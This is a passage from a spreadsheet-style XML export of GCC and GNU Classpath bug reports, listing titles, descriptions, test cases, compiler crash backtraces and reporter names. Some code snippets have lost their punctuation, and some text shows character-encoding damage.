	../../gcc-trunk/gcc/tree-outof-ssa.c:1172
0x992a90 execute
	../../gcc-trunk/gcc/cfgexpand.c:6164
Full pre-processed source is not publicly available but it is the same one as for bug #82244.
C-reduce was able to produce reduced-2.bare.c which I slightly reformatted to make it more readable: reduced-2.c. Both files attached.
Reproduce as:
$ gcc -c reduced-2.c -O2</t>
  </si>
  <si>
    <t>ivo.raisr</t>
  </si>
  <si>
    <t>GCC-59353</t>
  </si>
  <si>
    <t>-fsanitize=return is not documented</t>
  </si>
  <si>
    <t>Seems as if -fsanitize=return is now supported but now yet documented in invoke.texi</t>
  </si>
  <si>
    <t>GCC-2634</t>
  </si>
  <si>
    <t>istrstream state not correct upon failed conversion</t>
  </si>
  <si>
    <t>The state of an istrstream is not set to fail() or bad()
if the conversion from string to double fails. This is true
only for strings starting with an ('i' || 'I') or a 
('n' || 'N').
Try out the stupid test prog it's self explanatory.
Release:
GNU CPP version 2.95.3 20010315 (release) (i386 Linux/ELF)
Environment:
(i386 Linux/ELF) i686-pc-linux-gnu
gcc was build with --enable-shared --enable-threads
How-To-Repeat:
The test prog tries to convert all command line arguments
to double.
Use for example:</t>
  </si>
  <si>
    <t>dirk.steenpass</t>
  </si>
  <si>
    <t>GCC-18182</t>
  </si>
  <si>
    <t>Incorrect processing of __attribute__ by the C++ parser</t>
  </si>
  <si>
    <t>The C++ parser appears to ignore attributes that apply to nested declarators.
E.g. when trying to define an 'SImode-pointer to int' by 
  typedef int * __attribute__ ((mode (SI))) t
on s390x-ibm-linux the C++ parser silently ignores the attribute.
The following test case:
#include 
typedef int * __attribute__ ((mode (SI))) t
int main (void)
{
  t x
  printf (%d %d\n sizeof (x) sizeof (*x))
}
gives the correct result (4 4) when compiled with gcc
but the incorrect result 8 4 when compiled with g++.
[ For a simpler test case on systems without non-Pmode pointers
try using an invalid mode like:
typedef int * __attribute__ ((mode (TI))) t
With gcc this gives an error g++ accepts the code. ]
See the discussion at 
http://gcc.gnu.org/ml/gcc/2004-10/msg01081.html
for further details.</t>
  </si>
  <si>
    <t>CLASSPATH-22946</t>
  </si>
  <si>
    <t>swing: menuitems rendered badly if window is too small</t>
  </si>
  <si>
    <t xml:space="preserve">Steps to reproduce:
1. Compile and run the attached testcase I used classpath cvs 2005-05-19 and 1.3.0
2. A tiny window appears open the menu by clicking File.
Expected results:
File menu opens and all 10 menuitems are clearly visible.
Actual results:
File menu opens but menuitems are rendered badly. Items
are misaligned about 10 pixels to right. If I click File multiple times I can see that each time some menuitems become invisible. After 14 clicks all the menuitems are completely invisible.
This bug does not seem to occur if window dimensions are
set to (600 600) instead of (300 300).
Testcase:
import javax.swing.*
import java.awt.*
import java.awt.event.*
import javax.swing.event.*
import java.io.*
import java.util.*
public class MainWindow extends JFrame {
        public static void main(String[] args) {
                (new MainWindow()).show()
        }
        public MainWindow() {
                this.setSize(new Dimension(300 300))
                this.createMenus()
        }
        private void createMenus() {
                JMenuBar menuBar = new JMenuBar()
                this.setJMenuBar(menuBar)
                JMenu fileMenu = new JMenu(File)
                menuBar.add(fileMenu)
                for (int i=0 i&lt;10 i++) {
                        String menutext = 
                        for (int j=0 j&lt;40 j++)
                                menutext +=  + i
                        JMenuItem newMenuItem = new JMenuItem(menutext)
                        fileMenu.add(newMenuItem)
                }
        }
}
</t>
  </si>
  <si>
    <t>GCC-35337</t>
  </si>
  <si>
    <t>Broken diagnostic for firstprivate clause</t>
  </si>
  <si>
    <t>A broken diagnostic is issued for the following invalid code snippet since
GCC 4.2.0:
====================================================
struct A {}
void foo()
{
  #pragma omp parallel firstprivate(A)
}
====================================================
bug.cc: In function 'void foo()':
bug.cc:5: error: '#'type_decl' not supported by dump_expr#' is not a variable in clause 'firstprivate'
This is related to PR31748 and PR35244.</t>
  </si>
  <si>
    <t>GCC-22423</t>
  </si>
  <si>
    <t>Warnings when building libgfortran</t>
  </si>
  <si>
    <t>There are warnings when build libgfortran:
$grep warning buildlog
[snip]
../../../gcc/libgfortran/generated/matmul_i4.c:102: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_i4.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_i4.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_i4.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_i4.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_i4.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_i4.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_i8.c:102: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_i8.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_i8.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_i8.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_i8.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_i8.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_i8.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_r4.c:102: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_r4.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_r4.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_r4.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_r4.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_r4.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_r4.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_r8.c:102: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_r8.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_r8.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_r8.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_r8.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_r8.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_r8.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_c4.c:102: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_c4.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_c4.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_c4.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_c4.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_c4.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_c4.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_c8.c:102: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_c8.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_c8.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_c8.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_c8.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_c8.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/matmul_c8.c:185: warning: passing argument 1
../../../gcc/libgfortran/generated/transpose_i4.c:66: warning: passing argument
../../../gcc/libgfortran/generated/transpose_i8.c:66: warning: passing argument
../../../gcc/libgfortran/generated/transpose_c4.c:66: warning: passing argument
../../../gcc/libgfortran/generated/transpose_c8.c:66: warning: passing argument
../../../gcc/libgfortran/generated/eoshift1_4.c:61: warning: 'soffset' may be 
us
../../../gcc/libgfortran/generated/eoshift1_4.c:73: warning: 'len' may be used 
u
../../../gcc/libgfortran/generated/eoshift1_4.c:55: warning: 'roffset' may be 
us
../../../gcc/libgfortran/generated/eoshift1_8.c:61: warning: 'soffset' may be 
us
../../../gcc/libgfortran/generated/eoshift1_8.c:73: warning: 'len' may be used 
u
../../../gcc/libgfortran/generated/eoshift1_8.c:55: warning: 'roffset' may be 
us
../../../gcc/libgfortran/generated/eoshift3_4.c:75: warning: 'len' may be used 
u
../../../gcc/libgfortran/generated/eoshift3_4.c:59: warning: 'soffset' may be 
us
../../../gcc/libgfortran/generated/eoshift3_4.c:53: warning: 'roffset' may be 
us
../../../gcc/libgfortran/generated/eoshift3_8.c:75: warning: 'len' may be used 
u
../../../gcc/libgfortran/generated/eoshift3_8.c:59: warning: 'soffset' may be 
us
../../../gcc/libgfortran/generated/eoshift3_8.c:53: warning: 'roffset' may be 
us
../../../gcc/libgfortran/io/list_read.c:2187: warning: missing braces around 
ini
../../../gcc/libgfortran/io/list_read.c:2187: warning: (near initialization for
../../../gcc/libgfortran/io/list_read.c:2188: warning: missing braces around 
ini
../../../gcc/libgfortran/io/list_read.c:2188: warning: (near initialization for
../../../gcc/libgfortran/io/list_read.c:2025: warning: 'first_nl' may be used 
un
../../../gcc/libgfortran/io/list_read.c:2026: warning: 'root_nl' may be used 
uni
../../../gcc/libgfortran/intrinsics/eoshift0.c:50: warning: 'roffset' may be 
use
../../../gcc/libgfortran/intrinsics/eoshift0.c:64: warning: 'len' may be used 
un
../../../gcc/libgfortran/intrinsics/eoshift0.c:56: warning: 'soffset' may be 
use
../../../gcc/libgfortran/intrinsics/eoshift2.c:68: warning: 'len' may be used 
un
../../../gcc/libgfortran/intrinsics/eoshift2.c:56: warning: 'soffset' may be 
use
../../../gcc/libgfortran/intrinsics/eoshift2.c:50: warning: 'roffset' may be 
use
../../../gcc/libgfortran/intrinsics/spread_generic.c:48: warning: 'rdelta' may 
b
../../../gcc/libgfortran/intrinsics/rename.c:61: warning: implicit declaration 
o
../../../gcc/libgfortran/intrinsics/rename.c:61: warning: incompatible implicit
../../../gcc/libgfortran/intrinsics/rename.c:68: warning: implicit declaration 
o
../../../gcc/libgfortran/intrinsics/rename.c:94: warning: incompatible implicit
../../../gcc/libgfortran/intrinsics/unpack_generic.c:194: warning: passing 
argum
[snip]</t>
  </si>
  <si>
    <t>GCC-49264</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] Internal compiler error: segmentation fault</t>
  </si>
  <si>
    <t>$ g++ -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.6.1/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.6.0-10' --with-bugurl=file:///usr/share/doc/gcc-4.6/README.Bugs --enable-languages=cc++fortranobjcobj-c++go --prefix=/usr --program-suffix=-4.6 --enable-shared --enable-multiarch --with-multiarch-defaults=x86_64-linux-gnu --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.6 --libdir=/usr/lib --enable-nls --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-plugin --enable-objc-gc --with-arch-32=i586 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.6.1 20110526 (prerelease) (Debian 4.6.0-10)
$ g++ -DHAVE_CONFIG_H -I. -I../.. -I../lglib -I../bamglib -I../Graphics -I../femlib    -g  -DNDEBUG -O3 -mmmx -msse -msse2 -DDRAWING -DBAMG_LONG_LONG  -DNCHECKPTR -fPIC -c -fno-strict-aliasing -fwrapv -save-temps -Wall -Wextra -o array_long.o array_long.cpp
In file included from array_tlp.hpp:34:0
                 from array_long.cpp:28:
AFunction.hpp:1422:15: warning: unused parameter â€˜iâ€™ [-Wunused-parameter]
AFunction.hpp:1454:11: warning: unused parameter â€˜kâ€™ [-Wunused-parameter]
AFunction.hpp:1739:13: warning: unused parameter â€˜râ€™ [-Wunused-parameter]
AFunction.hpp:1739:13: warning: unused parameter â€˜topâ€™ [-Wunused-parameter]
In file included from array_tlp.hpp:34:0
                 from array_long.cpp:28:
AFunction.hpp:2233:19: warning: unused parameter â€˜aâ€™ [-Wunused-parameter]
AFunction.hpp:2233:19: warning: unused parameter â€˜bâ€™ [-Wunused-parameter]
In file included from array_tlp.hpp:34:0
                 from array_long.cpp:28:
AFunction.hpp:2872:18: warning: type qualifiers ignored on function return type [-Wignored-qualifiers]
AFunction.hpp:2944:13: warning: unused parameter â€˜lâ€™ [-Wunused-parameter]
AFunction.hpp:2944:13: warning: unused parameter â€˜topâ€™ [-Wunused-parameter]
In file included from array_long.cpp:28:0:
array_tlp.hpp: In function â€˜void ArrayOperator() [with K = long int Z = long int]â€™:
array_long.cpp:135:31:   instantiated from here
array_tlp.hpp:871:12: warning: unused variable â€˜knrpâ€™ [-Wunused-variable]
array_tlp.hpp:872:12: warning: unused variable â€˜knr_â€™ [-Wunused-variable]
array_tlp.hpp:883:12: warning: unused variable â€˜knlpâ€™ [-Wunused-variable]
In file included from array_long.cpp:28:0:
array_tlp.hpp: At global scope:
array_tlp.hpp: In instantiation of â€˜A fSubArrayc(const A&amp; const char&amp;) [with A = KN_]â€™:
array_tlp.hpp:887:6:   instantiated from â€˜void ArrayOperator() [with K = long int Z = long int]â€™
array_long.cpp:135:31:   instantiated from here
array_tlp.hpp:229:3: warning: unused parameter â€˜bâ€™ [-Wunused-parameter]
array_tlp.hpp: In instantiation of â€˜A fSubArrayc(const A&amp; const char&amp;) [with A = KN*]â€™:
array_tlp.hpp:890:6:   instantiated from â€˜void ArrayOperator() [with K = long int Z = long int]â€™
array_long.cpp:135:31:   instantiated from here
array_tlp.hpp:229:3: warning: unused parameter â€˜bâ€™ [-Wunused-parameter]
In file included from array_tlp.hpp:40:0
                 from array_long.cpp:28:
../femlib/RNM.hpp: In member function â€˜void KNM::resize(long int long int) [with R = long int]â€™:
array_resize.hpp:23:3:   instantiated from â€˜T* resize2(const Resize&amp; const long int&amp; const long int&amp;) [with T = KNM]â€™
array_tlp.hpp:954:6:   instantiated from â€˜void ArrayOperator() [with K = long int Z = long int]â€™
array_long.cpp:135:31:   instantiated from here
../femlib/RNM.hpp:1203:10: warning: unused variable â€˜lsoâ€™ [-Wunused-variable]
In file included from array_tlp.hpp:42:0
                 from array_long.cpp:28:
Operator.hpp: At global scope:
Operator.hpp: In instantiation of â€˜static R* Op3_p::f(Stack const A&amp; const B&amp; const C&amp;) [with R = if_arth_KN_ A = KN_ B = KN_ C = KN_ Stack = void*]â€™:
AFunction.hpp:2127:69:   instantiated from â€˜AnyType OneTernaryOperator3::Op::operator()(Stack) const [with T = Op3_p KN_ KN_ KN_ &gt; AnyType = AnyTypeWithOutCheck Stack = void*]â€™
array_long.cpp:167:1:   instantiated from here
Operator.hpp:585:13: warning: unused parameter â€˜sâ€™ [-Wunused-parameter]
In file included from array_long.cpp:28:0:
array_tlp.hpp: In static member function â€˜static if_arth_KN_* Op3_pacc::f(Stack const KN_&amp; const K&amp; const K&amp;) [with K = long int Stack = void*]â€™:
AFunction.hpp:2127:69:   instantiated from â€˜AnyType OneTernaryOperator3::Op::operator()(Stack) const [with T = Op3_pacc AnyType = AnyTypeWithOutCheck Stack = void*]â€™
array_long.cpp:167:1:   instantiated from here
array_tlp.hpp:758:4: warning: unused variable â€˜ccâ€™ [-Wunused-variable]
array_tlp.hpp:758:10: warning: unused variable â€˜bbâ€™ [-Wunused-variable]
array_tlp.hpp: At global scope:
array_tlp.hpp: In instantiation of â€˜static SetArray SetArray3::f(Stack const K&amp; const K&amp; const K&amp;) [with K = long int Stack = void*]â€™:
AFunction.hpp:2127:69:   instantiated from â€˜AnyType OneTernaryOperator3::Op::operator()(Stack) const [with T = SetArray3 AnyType = AnyTypeWithOutCheck Stack = void*]â€™
array_long.cpp:167:1:   instantiated from here
array_tlp.hpp:779:22: warning: unused parameter â€˜sâ€™ [-Wunused-parameter]
In file included from array_tlp.hpp:40:0
                 from array_long.cpp:28:
../femlib/RNM.hpp: In constructor â€˜SetArray::SetArray(long int R R) [with R = long int]â€™:
array_tlp.hpp:775:29:   instantiated from â€˜static SetArray SetArray2::f(const K&amp; const K&amp;) [with K = long int]â€™
AFunction.hpp:2253:85:   instantiated from â€˜AnyType OneBinaryOperator::Op::operator()(Stack) const [with C = SetArray2 MI = OneBinaryOperatorMI MIx = evalE_F2 AnyType = AnyTypeWithOutCheck Stack = void*]â€™
array_long.cpp:167:1:   instantiated from here
../femlib/RNM.hpp:366:10: warning: â€˜SetArray::nâ€™ will be initialized after [-Wreorder]
../femlib/RNM.hpp:365:9: warning:   â€˜long int SetArray::stepâ€™ [-Wreorder]
../femlib/RNM.hpp:367:14: warning:   when initialized here [-Wreorder]
array_long.cpp: In member function â€˜AnyType OneBinaryOperator::Opt::operator()(Stack) const [with C = set_AI_B &gt; MI = OneBinaryOperatorMI MIx = evalE_F2 AnyType = AnyTypeWithOutCheck Stack = void*]â€™:
array_long.cpp:167:1: internal compiler error: Î£Ï†Î¬Î»Î¼Î± ÎºÎ±Ï„Î¬Ï„Î¼Î·ÏƒÎ·Ï‚ (segmentation fault)
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>eftaxi12</t>
  </si>
  <si>
    <t>GCC-80969</t>
  </si>
  <si>
    <t>[8 Regression] ICE in ix86_expand_prologue at config/i386/i386.c:14606</t>
  </si>
  <si>
    <t>Starting from r248029 I see following ICE:
$ cat ice.ii
int a[56]
int b
main() {
  int c
  for ( b b++) {
    c = b
    if (b &amp; 1)
      c = 2
    a[b] = c
  }
}
$ gcc /tmp/ice.ii -Ofast -mabi=ms -c -mavx512f
/tmp/ice.ii: In function â€˜int main()â€™:
/tmp/ice.ii:11:1: internal compiler error: in ix86_expand_prologue at config/i386/i386.c:14606
 }
 ^
0x115b342 ix86_expand_prologue()
	../../gcc/config/i386/i386.c:14606
0x138772a gen_prologue()
	../../gcc/config/i386/i386.md:12456
0x113f9e8 target_gen_prologue
	../../gcc/config/i386/i386.md:18678
0xb3da37 make_prologue_seq
	../../gcc/function.c:5842
0xb3dc04 thread_prologue_and_epilogue_insns()
	../../gcc/function.c:5959
0xb3e2a2 rest_of_handle_thread_prologue_and_epilogue
	../../gcc/function.c:6428
0xb3e2a2 execute
	../../gcc/function.c:6470</t>
  </si>
  <si>
    <t>CLASSPATH-27220</t>
  </si>
  <si>
    <t>proper textcomponent navigation broken</t>
  </si>
  <si>
    <t>The navigation through text components should mainly happen by using the View.getNextVisualPositionFrom() method. However that and some related methods are not fully implemented.
These are:
View.getNextVisualPositionFrom() - for NORTH &amp; SOUTH direction
CompositeView.getNextEastWestVisualPositionFrom
CompositeView.getNextNorthSouthVisualPositionFrom
and probably others</t>
  </si>
  <si>
    <t>GCC-1085</t>
  </si>
  <si>
    <t>GCC rejects correct code</t>
  </si>
  <si>
    <t>Compiler generates the following error on correct code.
The compiler apparently fails to convert the 'const char[40]' to 'const char*'
as required.
CountedPtr.cpp: In member function `void ODB::CountedPtrBase::error() const':
CountedPtr.cpp:66: no matching function for call to 
   `std::domain_error::domain_error (const char[40])'
/usr/local/include/g++-v3/bits/std_stdexcept.h:48: candidates are: 
   std::domain_error::domain_error(const string&amp;)
/usr/local/include/g++-v3/bits/std_stdexcept.h:49:                 
   std::domain_error::domain_error(const std::domain_error&amp;)
Release:
gcc version 2.97 20001211 (experimental)
Environment:
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/specs
Configured with: ../gcc-20001211/configure
How-To-Repeat:
gcc -v --save-temps -c CountedPtr.cpp</t>
  </si>
  <si>
    <t>jack_reeves</t>
  </si>
  <si>
    <t>GCC-35314</t>
  </si>
  <si>
    <t>[4.3 regression] ICE with __builtin_setjmp and -fmudflap</t>
  </si>
  <si>
    <t>The following valid testcase triggers an ICE since GCC 4.2.0 when compiled
with -fmudflap:
====================================
#include
jmp_buf buf
void foo(volatile char* p)
{
  if (__builtin_setjmp(buf))
    *p
}
====================================
bug.c: In function 'foo':
bug.c:6: error: control flow in the middle of basic block 11
bug.c:6: error: control flow in the middle of basic block 11
bug.c:6: internal compiler error: verify_flow_info failed
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-50627</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] Error recovery: ICE in gfc_free_namespace after diagnosing missing end of construct</t>
  </si>
  <si>
    <t>The following bogus code is properly diagnosed but then once gets an ICE:
.... (some more error messages) ...
Error: Expecting END MODULE statement at (1)
f951: internal compiler error: in gfc_free_namespace at fortran/symbol.c:3259
The result is the same for 4.6 and 4.7 4.5 seems to enter an endless loop - and 4.4 simply prints an error as it does not know CLASS or SELECT TYPE.
module m
  type t
  end type t
  class(t) allocatable :: xx
  select type(xx)
  ! type is(t)
  !   stop
  end select
end</t>
  </si>
  <si>
    <t>GCC-1957</t>
  </si>
  <si>
    <t>Re: build/install failure with -jN N &gt; 1 and nonexistent $(prefix)</t>
  </si>
  <si>
    <t xml:space="preserve"> On Feb 12 2001 Jim Meyering  wrote:
 &gt; FYI this was previously reported (though with an incomplete patch)
 &gt; and assigned the gnats ID c++/1711.
 Thanks.  I believe the patch is Ok but it must be posted to
 gcc-patches@gcc.gnu.org before it can be checked in.  Will you please
 post it there?
 -- 
 Alexandre Oliva   Enjoy Guarana' see http://www.ic.unicamp.br/~oliva/
 Red Hat GCC Developer                  aoliva@{cygnus.com redhat.com}
 CS PhD student at IC-Unicamp        oliva@{lsd.ic.unicamp.br gnu.org}
 Free Software Evangelist    *Please* write to mailing lists not to me
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-6989</t>
  </si>
  <si>
    <t>crash of application with pure virtual methods and method pointers</t>
  </si>
  <si>
    <t>The attached code sample shows the bug. A method pointer and object reference are stored in a sperate class (M). The Class B is derived from class A.
In the constructor of A the this pointer and method pointer are used to initialize an instance of M which is a member of A. Finally (in the constructor of A) the method is called in M by the method pointer and object reference.
In main an instance of B is created. This will call the constructor of A which will create and initialize an instance of M and then call the method using Ms call method.
Now the method which is called is named method1. method1 will call method2 which is (in As scope) a pure virtual method. Now since we have an instance of B (and B defines method2 as a normal virtual method) A should call B::method2 from inside of A::method1.
Everything compiles perfectly! But when you let this run you get a pure virtual method call error!
When you place the M::call part to (e.g.) the main function it works as it should. Only when the M::call part is in the constructor of A the problem exists!
It looks like as if all G++ version do have this problem. I tried this with MS Visual C++ 5.0 and it worked! The problem is that I don't trust MSVC. Therefore I'm not sure if this code is valid code (maybe I'm violating ANSI C++ *gg*).
Release:
2.95.3 3.0.4 2.96-110 egcs-2.91
Environment:
I tried different combinations but all produced the same problem:
gcc 2.95.3 suse linux 8.0 x86
gcc 3.0.4 suse linux 8.0 x86
gcc 2.96-110 redhat linux 7.3 x86
egcs-2.91 redhat linux 7.3 x86
How-To-Repeat:
recompile and run result</t>
  </si>
  <si>
    <t>ctron</t>
  </si>
  <si>
    <t>GCC-67032</t>
  </si>
  <si>
    <t>[4.9/5/6 Regression] Geode optimizations incorrectly return -NaN</t>
  </si>
  <si>
    <t>When optimizing for the Geode architecture (-O2 -march=geode) functions may incorrectly return -NaN instead of the expected result.
Here's a test case. (I apologize for its length most of my attempts to shorten it cause the bug to not manifest.)
/* main.cpp */
#include Statistic.h
#include 
void acquire_data()
{
  Statistic stat
  stat.Accumulate(0)
  stat.Accumulate(0)
  std::cout &lt;&lt; stat.Var() &lt;&lt; std::endl
  std::cout &lt;&lt; stat.StdDev() &lt;&lt; std::endl
}
int main(int char**)
{
  acquire_data()
}
/* Statistic.h */
#define STATISTICH
#include 
#include 
#define MY_ASSERT(expr) ((expr) ? (0): std::puts(#expr))
class Statistic
{
public:
  Statistic() : mCount(0) mSum(0) mSumSquared(0) {}
  void Accumulate(int val)
  double Var() const { MY_ASSERT(mCount &gt; 0) return mCount == 1 ? 0 : (mSumSquared - mSum * mSum / mCount) / (mCount - 1) }
  double StdDev() const { if (Var() &lt; 0.00000001) return 0 else return std::sqrt(Var()) }
private:
  unsigned mCount
  double mSum mSumSquared
}
#endif
/* Statistic.cpp */
#include Statistic.h
void Statistic::Accumulate(int val)
{
  mCount++
  mSum += val
  mSumSquared += double(val) * double(val)
}
The expected output is
0
0
However when compiled with -O2 -march=geode the output is
0
-nan
I can reproduce this bug in Ubuntu's g++ 4.9.2 and 5.1.0 and a from-source g++ 5.1.0 but not in Ubuntu's g++ 4.8.4 or 4.6.4 or a from-source g++ 4.6.4.</t>
  </si>
  <si>
    <t>joshkel</t>
  </si>
  <si>
    <t>GCC-31260</t>
  </si>
  <si>
    <t>[4.2 Regression] ICE: segmentation fault with template code</t>
  </si>
  <si>
    <t>Using SVN revision 123051
&gt; cat bug.ii
template struct S1 {
template struct S2
template class T3&gt; struct S3 {
template &gt; struct S4 {}
struct S5 : S4 {
&gt; g++ bug.ii
bug-segv.ii:5: internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>GCC-57000</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE with -Ofast and -frounding-math</t>
  </si>
  <si>
    <t>The attached source file produces ICE for compilation command
g++ -c  -Ofast -frounding-math -std=c++11 polyhedron-preprocessed.cc -v                                                              
Using built-in specs.                                                           
COLLECT_GCC=g++                                                                 
Target: x86_64-unknown-linux-gnu                                                
Configured with: ../gcc-4.8-20130411/configure --enable-languages=fortran --prefix=/usr/local/gcc-4.8                                                           
Thread model: posix                                                             
gcc version 4.8.1 20130411 (prerelease) (GCC)                                   
COLLECT_GCC_OPTIONS='-c' '-Ofast' '-frounding-math' '-std=c++11' '-v' '-shared-libgcc' '-mtune=generic' '-march=x86-64'                                         
 /usr/local/gcc-4.8/libexec/gcc/x86_64-unknown-linux-gnu/4.8.1/cc1plus -quiet -v -D_GNU_SOURCE polyhedron-preprocessed.cc -quiet -dumpbase polyhedron-preprocessed.cc -mtune=generic -march=x86-64 -auxbase polyhedron-preprocessed -Ofast -std=c++11 -version -frounding-math -o /tmp/ccDOqrHe.s                               
GNU C++ (GCC) version 4.8.1 20130411 (prerelease) (x86_64-unknown-linux-gnu)    
        compiled by GNU C version 4.8.1 20130411 (prerelease) GMP version 4.3.1 MPFR version 2.4.1-p5 MPC version 0.8.1                                      
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072      
ignoring nonexistent directory /usr/local/gcc-4.8/lib/gcc/x86_64-unknown-linux-gnu/4.8.1/../../../../x86_64-unknown-linux-gnu/include                         
#include ... search starts here:                                              
#include  search starts here:                                              
 /usr/local/gcc-4.8/lib/gcc/x86_64-unknown-linux-gnu/4.8.1/../../../../include/c++/4.8.1                                                                        
 /usr/local/gcc-4.8/lib/gcc/x86_64-unknown-linux-gnu/4.8.1/../../../../include/c++/4.8.1/x86_64-unknown-linux-gnu                                               
 /usr/local/gcc-4.8/lib/gcc/x86_64-unknown-linux-gnu/4.8.1/../../../../include/c++/4.8.1/backward                                                               
 /usr/local/gcc-4.8/lib/gcc/x86_64-unknown-linux-gnu/4.8.1/include              
 /usr/local/include                                                             
 /usr/local/gcc-4.8/include                                                     
 /usr/local/gcc-4.8/lib/gcc/x86_64-unknown-linux-gnu/4.8.1/include-fixed        
 /usr/include                                                                   
End of search list.                                                             
GNU C++ (GCC) version 4.8.1 20130411 (prerelease) (x86_64-unknown-linux-gnu)    
        compiled by GNU C version 4.8.1 20130411 (prerelease) GMP version 4.3.1 MPFR version 2.4.1-p5 MPC version 0.8.1                                      
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072      
Compiler executable checksum: 56fe9a649d5acfd8c75015f1b8b7dca4                  
In file included from /usr/local/include/CGAL/AABB_tree.h:26:0                 
                 from cgal_polyhedra.cc:2:                                      
/usr/local/include/CGAL/internal/AABB_tree/AABB_traversal_traits.h: In member function â€˜void CGAL::internal::AABB_tree::Projection_traits::intersection(const Point CGAL::internal::AABB_tree::Projection_traits::Point = CGAL::Point_3 &gt; CGAL::internal::AABB_tree::Projection_traits::Primitive = CGAL::AABB_polyhedron_triangle_primitive CGAL::Polyhedron_3 &gt; &gt;]â€™:
/usr/local/include/CGAL/internal/AABB_tree/AABB_traversal_traits.h:299:8: internal compiler error: NeoprÃ¡vnÄ›nÃ½ pÅ™Ã­stup do pamÄ›ti (SIGSEGV)
   void intersection(const Point&amp; query const Primitive&amp; primitive)
        ^
0x8b40bf crash_signal
        ../../gcc-4.8-20130411/gcc/toplev.c:332
0x92c8b2 gimple_code
        ../../gcc-4.8-20130411/gcc/gimple.h:1149
0x92c8b2 gimple_nop_p
        ../../gcc-4.8-20130411/gcc/gimple.h:4875
0x92c8b2 walk_aliased_vdefs_1
        ../../gcc-4.8-20130411/gcc/tree-ssa-alias.c:2202
0x92d32d walk_aliased_vdefs(ao_ref_s* tree_node* bool (*)(ao_ref_s* tree_node* void*) void* bitmap_head_def**)
        ../../gcc-4.8-20130411/gcc/tree-ssa-alias.c:2238
0x93bdfb propagate_necessity
        ../../gcc-4.8-20130411/gcc/tree-ssa-dce.c:908
0x93cb14 perform_tree_ssa_dce
        ../../gcc-4.8-20130411/gcc/tree-ssa-dce.c:1583
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
It works on another machine with GCC 4.7.2.</t>
  </si>
  <si>
    <t>GCC-35710</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/vect/section-anchors-pr27770.c (test for excess errors)</t>
  </si>
  <si>
    <t>On powerpc-apple-darwin* we have the following failures (among others):
FAIL: gcc.dg/vect/section-anchors-pr27770.c (test for excess errors)
FAIL: gcc.dg/vect/section-anchors-vect-69.c (test for excess errors)
This can be fixed by the following patch (borrowed from gcc/testsuite/gcc.dg/pr26427.c):
diff -u /opt/gcc/_gcc_clean/gcc/testsuite/gcc.dg/vect/section-anchors-pr27770.c /opt/gcc/gcc-4.4-work/gcc/testsuite/gcc.dg/vect/section-anchors-pr27770.c
--- /opt/gcc/_gcc_clean/gcc/testsuite/gcc.dg/vect/section-anchors-pr27770.c     2007-11-07 10:20:18.000000000 +0100
